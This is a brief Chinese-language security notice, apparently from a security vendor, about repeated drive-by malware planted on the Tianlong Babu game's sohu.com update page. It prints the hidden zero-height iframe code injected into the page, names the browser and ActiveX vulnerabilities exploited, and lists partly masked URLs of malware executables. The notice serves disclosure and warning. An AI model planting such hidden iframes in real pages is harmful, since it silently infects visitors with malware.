天龙八部更新公告页面(http://update.tl.sohu.com/tlbb/readme.htm)多次被黑客植入恶意代码,从8月初到现在已经被挂马3次。
从http://www.t****.cn/a0208291/a20.htm至http://www.t****.cn/a0208291/a20.htm均为挂马页面。
该网站问题代码:


<iframe src=" http://www.t****.cn/a0208291/a20.htm" width="100"
height="0"></iframe>
http://www.t****.cn/a0208291/a20.htm问题框架代码:

<iframe width=100 height=0 src=new.html></iframe>
http://www.t****.cn/a0208291/new.html网马代码:

以上加密网马解密后可知利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Adobe Flash Player SWF文件漏洞
暴风影音II mps.dll ActiveX栈溢出漏洞
当用户访问http://up****.tl.sohu.com/tlbb/readme.htm时,系统会自动下载以下病毒文件:
http://cdn.e5****.com/upkk.exe
http://cdn.e5****.com/up01.exe
http://cdn.e5****.com/up01B.exe
http://cdn.e5****.com/up02.exe
http://cdn.e5****.com/up02B.exe
http://cdn.e5****.com/up03B.exe
http://cdn.e5****.com/up05.exe
http://cdn.e5****.com/up06.exe
http://cdn.e5****.com/up07.exe
http://cdn.e5****.com/up08.exe
http://cdn.e5****.com/up10.exe
http://cdn.e5****.com/up11.exe
http://cdn.e5****.com/up12.exe
http://cdn.e5****.com/up13.exe
http://cdn.e5****.com/up14.exe
http://cdn.e5****.com/up15.exe
http://cdn.e5****.com/up16.exe
http://cdn.e5****.com/up17.exe
http://cdn.e5****.com/up18.exe
http://cdn.e5****.com/up19.exe
http://cdn.e5****.com/up20.exe
http://cdn.e5****.com/up21.exe
http://cdn.e5****.com/up22.exe
http://cdn.e5****.com/up23.exe
http://cdn.e5****.com/up24.exe